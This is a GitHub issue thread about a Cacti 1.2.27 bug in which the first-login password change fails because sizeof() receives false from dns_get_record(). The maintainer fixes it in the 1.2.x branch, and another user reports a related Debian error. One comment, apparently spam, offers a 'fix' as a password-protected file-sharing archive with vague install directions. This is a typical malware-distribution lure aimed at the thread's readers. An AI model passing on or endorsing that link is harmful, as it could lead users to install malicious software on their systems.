### ISSUE TITLE
When installing, password changes may fail on new installations

### ISSUE THREAD

**Issue by martixy** [Cacti/cacti#5813]
# Describe the bug

Can't change password when first installing

## To Reproduce

1. Try to setup cacti.
2. Reach until first login, where you're forced to change pw.
3. Fail

## Bug

cacti v1.2.27
php v8.3.11

```
"PHP message: PHP Warning:  dns_get_record(): A temporary server error occurred. in /mnt/http_mount/cacti/auth_changepassword.php on line 345; PHP message: PHP Fatal error:  Uncaught TypeError: sizeof(): Argument #1 ($value) must be of type Countable|array, false given in /mnt/http_mount/cacti/auth_changepassword.php:352
Stack trace:
#0 {main}
  thrown in /mnt/http_mount/cacti/auth_changepassword.php on line 352" while reading response header from upstream, client: 192.168.0.1, server: martixy.dmn-design.com, request: "GET /cacti/auth_changepassword.php?ref=https://martixy.dmn-design.com/cacti/install/install.php HTTP/2.0", upstream: "fastcgi://unix:/run/php/php-fpm.sock:", host: "martixy.dmn-design.com", referrer: "https://martixy.dmn-design.com/cacti/install/install.php"
```
aka
`sizeof()` throws, because `dns_get_record()` can return false, for whatever reason ¯\\\_(ツ)_/¯.
Frankly, not sure what the purpose of that sizeof call is...

After bypassing that we end up here:
`cacti_log('WARNING: User attempted to access Cacti from unkonwn URL', false, 'AUTH');`
and the browser throws a "too many redirects" error.
And with that, my will to debug this problem ran out.

P.S. Does the root folder have to be named cacti? It'd be cool if it didn't matter.

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by TheWitness** [comment]
Wow, interesting.  Fixing now.

**Comment by TheWitness** [comment]
Should be fixed.  Update `auth_changepassword.php` from the 1.2.x branch.

**Comment by SasSam** [comment]
Same here. Fresh install. After the 1st login with admin/admin I've got too many redirects and 500.

Log:
```
2024-11-20 20:25:24 - AUTH LOGIN: User 'admin' authenticated
2024-11-20 20:25:54 - ERROR PHP DEPRECATED: gethostbyname(): Passing null to parameter #1 ($hostname) of type string is deprecated in file: /usr/share/cacti/site/auth_changepassword.php  on line: 312
```

Installed with apt on debian 12:

`cacti/stable,stable,now 1.2.24+ds1-1+deb12u4 all [installed]`

**Comment by TheWitness** [comment]
Upgrade to 1.2.28 or better yet to 1.2.x.
